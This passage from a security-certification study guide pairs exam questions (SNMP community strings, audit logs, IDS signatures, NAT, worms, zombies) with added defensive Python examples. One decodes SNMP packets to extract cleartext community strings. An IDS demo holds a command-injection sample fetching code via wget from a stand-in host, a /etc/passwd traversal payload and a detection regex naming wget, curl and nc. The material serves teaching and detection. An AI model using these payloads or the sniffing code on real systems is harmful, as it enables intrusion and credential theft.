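    after the probe (ruling out processes that came or went mid-scan), and is not
    a thread, has been removed from what readdir() returns: the rootkit signature.
    """
    candidates = probed - listed_before - listed_after
    return {pid for pid in candidates if not thread_check(pid)}


def pid_max(path="/proc/sys/kernel/pid_max", default=32768):
    try:
        with open(path) as fh:
            return int(fh.read())
    except OSError:
        return default


def scan():
    before = listed_pids()
    probed = probed_pids(min(pid_max(), 65536))
    after = listed_pids()
    return hidden_pids(before, probed, after)


if __name__ == "__main__":
    found = scan()
    print("hidden PIDs:", sorted(found) if found else "none")
```

The check only works while the rootkit lies to readdir() but not to kill(); a kernel-level rootkit that hooks both leaves no discrepancy to find, which is why the in-depth analysis the explanation recommends eventually means a memory image or a boot from trusted media rather than more tools run on the compromised host.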

You need to protect passwords. Which of the following protocols is not recommended because it can supply passwords over the network?

SNMP SNMP (Simple Network Management Protocol) versions 1 and 2c authenticate with a community string that is sent in cleartext in every packet, so anyone sniffing the network (or guessing defaults such as public and private) obtains it. This is a security risk and those versions should be avoided if possible. At the very least, use the latest version, SNMPv3, with authentication and privacy enabled, and be careful to protect the devices that are monitored over SNMP, such as switches, UPSs, and so on. DNS (Domain Name System) and ICMP (Internet Control Message Protocol) do not carry passwords. Kerberos never sends the password itself: the client proves knowledge of it by encrypting a timestamp with a key derived from it, and the tickets that follow are encrypted, so the most an eavesdropper obtains is material for an offline guessing attack against a weak password.
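To make "supplies passwords over the network" concrete, here is an added example (not from the book or the page) that decodes an SNMP datagram the way a sniffer on UDP port 161 would and pulls out the community string. SNMP messages are BER-encoded ASN.1; the two packets below are constructed in the example itself (a v2c GetRequest for sysDescr.0 and the leading header of a v3 message), and the community string "public" is the well-known default, not a real credential.

```python
def ber(tag, content):
    """Encode one BER TLV with a short-form length (enough for small packets)."""
    return bytes([tag, len(content)]) + content


def read_tlv(buf, pos=0):
    """Decode one TLV at pos; returns (tag, value, next_pos). Handles long-form lengths."""
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln


def oid_to_str(raw):
    """Decode a BER-encoded OID (first byte packs the first two arcs, rest are base-128)."""
    arcs, val = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))


def snmp_summary(packet):
    """Return (version, community, first requested OID).

    v1 and v2c carry the community string in the clear as the second field.
    v3 has no community field; its credentials live in the USM security parameters
    and can be authenticated and encrypted, so the function stops at the version.
    """
    tag, msg, _ = read_tlv(packet)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, ver, pos = read_tlv(msg)
    version = int.from_bytes(ver, "big")  # 0 = v1, 1 = v2c, 3 = v3
    if version == 3:
        return 3, None, None
    tag, community, pos = read_tlv(msg, pos)
    if tag != 0x04:
        raise ValueError("expected community OCTET STRING")
    _, pdu, _ = read_tlv(msg, pos)       # GetRequest (0xA0) / GetNext / Set ...
    _, _, p = read_tlv(pdu)              # request-id
    _, _, p = read_tlv(pdu, p)           # error-status
    _, _, p = read_tlv(pdu, p)           # error-index
    _, varbinds, _ = read_tlv(pdu, p)
    _, first_vb, _ = read_tlv(varbinds)
    _, oid, _ = read_tlv(first_vb)
    return version, community.decode("ascii", "replace"), oid_to_str(oid)


# Constructed sample datagrams (not captured traffic).
SYS_DESCR_0 = bytes([0x2B, 6, 1, 2, 1, 1, 1, 0])  # 1.3.6.1.2.1.1.1.0
V2C_GET = ber(0x30,
              ber(0x02, b"\x01")                       # version 1 = SNMPv2c
              + ber(0x04, b"public")                   # community string, cleartext
              + ber(0xA0,                              # GetRequest-PDU
                    ber(0x02, b"\x2A") + ber(0x02, b"\x00") + ber(0x02, b"\x00")
                    + ber(0x30, ber(0x30, ber(0x06, SYS_DESCR_0) + ber(0x05, b"")))))
V3_HEADER = ber(0x30,
                ber(0x02, b"\x03")                     # version 3
                + ber(0x30, ber(0x02, b"\x2A") + ber(0x02, b"\x01\x00")
                      + ber(0x04, b"\x04") + ber(0x02, b"\x03")))  # msgGlobalData only


if __name__ == "__main__":
    print(snmp_summary(V2C_GET))
    print(snmp_summary(V3_HEADER))
```

Pointing the same decoder at the payload of every UDP/161 packet in a capture lists each community string in use, which is exactly the exposure the question is about; note that a weak SNMPv3 setup (noAuthNoPriv, or authNoPriv with a guessable passphrase) still leaks more than it should, so the version number alone is not the whole fix.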

You are in charge of auditing resources and the changes made to those resources. Which of the following log files will show any unauthorized changes to those resources?

Security log file The Security log file shows any unauthorized changes to the resources that you decide to audit. These resources can include files, folders, printers, and so on. This can work only if object access auditing has been enabled, and if auditing has been turned on for the resource in question. The System log file logs information pertaining to drivers, operating system files, the kernel, and so on. The Application log file logs information pertaining to applications such as Windows Explorer, File Explorer, the Command Prompt, and third-party applications. The Directory Services log file takes care of logging information pertaining to Active Directory.

An IDS looks for patterns to aid in detecting attacks. What are these patterns known as?

Signatures Signatures are the patterns that an IDS looks for when detecting attacks. This is known as signature-based monitoring and is common to IDS solutions and antivirus programs. Anomalies are detected through the use of anomaly-based monitoring. Viruses and most other types of malware have a specific signature. As long as the signature-based monitoring system has the signature within its database, the virus or other malware should be detected. If the virus is brand new and the signature-based monitoring system has not been updated and does not have the signature of the new virus within its database, the virus just might wreak havoc.

Which of the following needs to be backed up on a domain controller to recover Active Directory?

System State The System State needs to be backed up on a domain controller to recover the Active Directory database in the future. On a domain controller the System State includes the registry, the boot files, the COM+ class registration database, the Active Directory database (NTDS.dit) and the SYSVOL share; it does not include user data or the entire operating system. If a server fails, the operating system would have to be reinstalled, and then the System State would need to be restored. Consider backing up the System State from the command line with Windows Server Backup; see the following TechNet link for more: https://technet.microsoft.com/en-us/library/cc753201(v=ws.11).aspx.

Analyze the following network traffic logs depicting communications between Computer1 and Computer2 on opposite sides of a router. The information was captured by the computer with the IPv4 address 10.254.254.10.

The router implements NAT. The only one of the listed answers that you can infer from the log is that the router implements network address translation (NAT). You can tell this from the first line of the log, which shows the inside of the router using the 192.168.1.1 IP address and the outside using 10.254.254.1. NAT is occurring between the two at the router. This allows the IP 192.168.1.105 to communicate with 10.254.254.10 ultimately. However, the rest of the log only shows the first step of that communication between 10.254.254.10 and the router at 10.254.254.1. What's really happening here? The router is showing that port 3030 is being used on 10.254.254.1. That is the port used by an online game known as netPanzer as well as a mass-e-mailing backdoor worm. The client (10.254.254.10) is using port 80 to make a web-based connection to the game. You can see the three-way TCP handshake occurring with the SYN, SYN/ACK, and ACK packets. Ultimately, 10.254.254.10 is communicating with 192.168.1.105, but we only see the first stage of that communication to the router. As a security analyst you would most likely want to shut down the use of port 3030, so that employees can be more productive and you have less overall chance of a network breach. As for the incorrect answers, the router definitely is not filtering out port 80, as traffic is successfully being sent on that port. 192.168.1.105 is not a web server; it is most likely used for other purposes. Finally, even though port 80 is used by the client computer, there is likely no web server in this scenario.

You are implementing a testing environment for the development team. They use several virtual servers to test their applications. One of these applications requires that the servers communicate with each other. However, to keep this network safe and private, you do not want it to be routable to the firewall. What is the best method to accomplish this?

Use a virtual switch The virtual switch is the best option. This virtual device will connect the virtual servers together without being routable to the firewall (by default). Removing the virtual network from the routing table is another possibility; but if you have not created a virtual switch yet, it should not be necessary. A physical standalone switch won't be able to connect the virtual servers together; a virtual switch (or individual virtual connections) is required. Creating a VLAN would also require a physical switch. In that scenario, you can have multiple virtual LANs each containing physical computers (not virtual computers), and each working off of the same physical switch. That answer would keep the VLAN from being routable to the firewall, but not virtual servers.

A hacker develops a piece of malicious code that is not designed to automatically spread from one system to another. Instead, it is designed to spread from one file to another file on the individual computer. What type of malware is this?

Virus A virus is designed to spread from one file to another file on an individual computer. It is not designed to automatically spread from one system to another; that would be a worm.A Trojan is malicious code that appears to do something legitimate but does something illegitimate outside the view of the user. A botnet is a group of compromised computers normally known as zombies.

Which of the following is the best description of a security advantage when using a standardized server image?

Mandated security configurations have been applied to the operating system Organizations develop standardized images for their server operating systems. They are standardized according to organizational policy, so any mandated security configurations (hardening settings, disabled services, audit policy, and so on) are applied to the OS before it is made into an image to be deployed on the network. Unfortunately, that only gets the OS image to a certain point in time. Any new AV definitions, security updates to the OS, and so on, will need to be applied afterward according to organizational policy. OS licensing trackability should not change: whether you track your OS licenses on paper or with a scanning program, image-deployed systems are tracked the same way as any other operating system.

Dan is a network administrator. One day he notices that his DHCP server is flooded with information. He analyzes it and finds that the information is coming from more than 50 computers on the network. Which of the following is the most likely reason?

Worm A worm is most likely the reason that the server is being bombarded with information by the clients; perhaps it is perpetuated by a botnet. Because worms self-replicate, the damage can quickly become critical.
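Dan's DHCP server noticed the worm because fifty hosts behaving alike is an anomaly, not because a rule described it; the IDS question earlier on this page ("what are these patterns known as?") covers the other approach, matching known signatures. This added example (not from the book or the page) implements both over constructed input: a few signatures run against sample HTTP payloads, and a sliding-window rate check over sample DHCPDISCOVER log lines that flags the MACs flooding the server. The log format, thresholds, addresses and payloads are all made up for the example.

```python
import re
from collections import defaultdict

# --- Signature-based detection: the IDS alerts only on patterns it already knows ---
SIGNATURES = {
    "dir_traversal": re.compile(rb"\.\./\.\./"),
    "shell_cmd_injection": re.compile(rb"[;|&]\s*(?:cat|wget|curl|nc)\b"),
}

# Constructed sample traffic as (src_ip, payload); not a real capture.
SAMPLE_PACKETS = [
    ("10.0.0.5", b"GET /index.html HTTP/1.1"),
    ("10.0.0.9", b"GET /../../etc/passwd HTTP/1.1"),
    ("10.0.0.9", b"GET /cgi-bin/t?x=;wget http://example.invalid/a HTTP/1.1"),
    ("10.0.0.7", b"GET /login?user=alice HTTP/1.1"),
]


def signature_hits(packets, signatures=SIGNATURES):
    """(src, signature_name) for every packet matching a known pattern."""
    return [(src, name) for src, payload in packets
            for name, pat in signatures.items() if pat.search(payload)]


# --- Anomaly-based detection: behaviour that departs from the baseline ---
DHCP_LINE = re.compile(r"^(\d\d):(\d\d):(\d\d) \S+ dhcpd: DHCPDISCOVER from ([0-9a-f:]{17})")


def discovers_per_mac(lines):
    """MAC -> list of seconds-of-day at which it sent a DHCPDISCOVER."""
    per_mac = defaultdict(list)
    for line in lines:
        m = DHCP_LINE.match(line)
        if m:
            h, mi, s, mac = m.groups()
            per_mac[mac].append(int(h) * 3600 + int(mi) * 60 + int(s))
    return per_mac


def flood_sources(lines, window=60, threshold=5):
    """MACs whose DISCOVER count inside any `window`-second span exceeds `threshold`.

    A healthy client sends a handful of DISCOVERs at boot or lease expiry; a
    worm-driven host hammers the server continuously, and many hosts doing it at
    once is the picture Dan saw. Returns MAC -> peak count in the worst window.
    """
    flagged = {}
    for mac, ts in discovers_per_mac(lines).items():
        ts.sort()
        j, peak = 0, 0
        for i, t in enumerate(ts):          # two-pointer sliding window
            while t - ts[j] > window:
                j += 1
            peak = max(peak, i - j + 1)
        if peak > threshold:
            flagged[mac] = peak
    return flagged


# Constructed sample DHCP log: one normal client and three infected ones.
NORMAL = "aa:bb:cc:dd:ee:01"
INFECTED = ["aa:bb:cc:dd:ee:%02x" % i for i in range(0x10, 0x13)]


def _line(sec, mac):
    return f"10:{sec // 60:02d}:{sec % 60:02d} dhcp01 dhcpd: DHCPDISCOVER from {mac} via eth0"


SAMPLE_LOG = [_line(0, NORMAL), _line(300, NORMAL)] + \
             [_line(s, mac) for mac in INFECTED for s in range(0, 30, 2)]


def detect():
    return {"signature_alerts": signature_hits(SAMPLE_PACKETS),
            "dhcp_flood_sources": flood_sources(SAMPLE_LOG)}


if __name__ == "__main__":
    for k, v in detect().items():
        print(k, v)
```

The two halves fail in opposite ways: the signature list misses anything it has never seen (a brand-new worm, in the words of the IDS explanation), while the rate check catches the new worm but will also flag a legitimately misbehaving client until the threshold is tuned to the environment's baseline.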

Which of the following computer security threats can be updated automatically and remotely? (Select the best answer.)

Zombie Zombies (also known as zombie computers) are systems that have been compromised without the knowledge of the owner. A prerequisite is the computer must be connected to the Internet so that the hacker or malicious attack can make its way to the computer and be controlled remotely. Multiple zombies working in concert often form a botnet. See the section "Delivery of Malware" earlier in this lesson for more information.